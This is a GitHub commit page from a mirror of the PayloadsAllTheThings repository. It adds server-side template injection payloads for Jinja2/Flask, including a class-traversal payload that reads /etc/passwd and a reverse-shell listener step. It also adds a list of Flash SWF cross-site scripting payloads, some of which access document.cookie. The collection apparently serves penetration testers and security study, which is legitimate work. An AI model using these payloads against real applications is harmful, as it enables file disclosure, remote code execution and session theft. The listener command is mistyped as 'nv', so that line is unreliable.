ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-20 13:46:05 +00:00
Code Issues Actions 1 Packages Projects Releases Wiki Activity

SSTI + XSS Flash

Browse Source
This commit is contained in:
Swissky 2017-07-16 16:30:08 +02:00
parent 77e2fc8226
commit 064467ecfc
3 changed files with 21 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
Template injections/JHADDIX_SSI_Injection.txt → Server Side Template injections/JHADDIX_SSI_Injection.txt
View File

9
Template injections/README.md → Server Side Template injections/README.md
View File

@ -6,6 +6,11 @@ Template injection allows an attacker to include template code into an existant
[Official website](http://jinja.pocoo.org/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
Basic injection
```
{{4*4}}[[5*5]]
```
Jinja2 is used by Python Web Frameworks such as Django or Flask.
The above injections have been tested on Flask application.
#### Template format
@ -37,7 +42,7 @@ The above injections have been tested on Flask application.
#### Read remote file
```
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
```
#### Write into remote file
@ -46,7 +51,7 @@ The above injections have been tested on Flask application.
```
#### Remote Code Execution via reverse shell
Listen for connexion
Listen for connexion
```
nv -lnvp 8000
```

19
XSS injection/README.md
View File

@ -73,11 +73,20 @@ With an additional URL
XSS in flash application
```
\%22})))}catch(e){alert(document.domain);}//
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
"a")(({type:"ready"}));}catch(e){alert(1)}//
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
```
XSS in Hidden input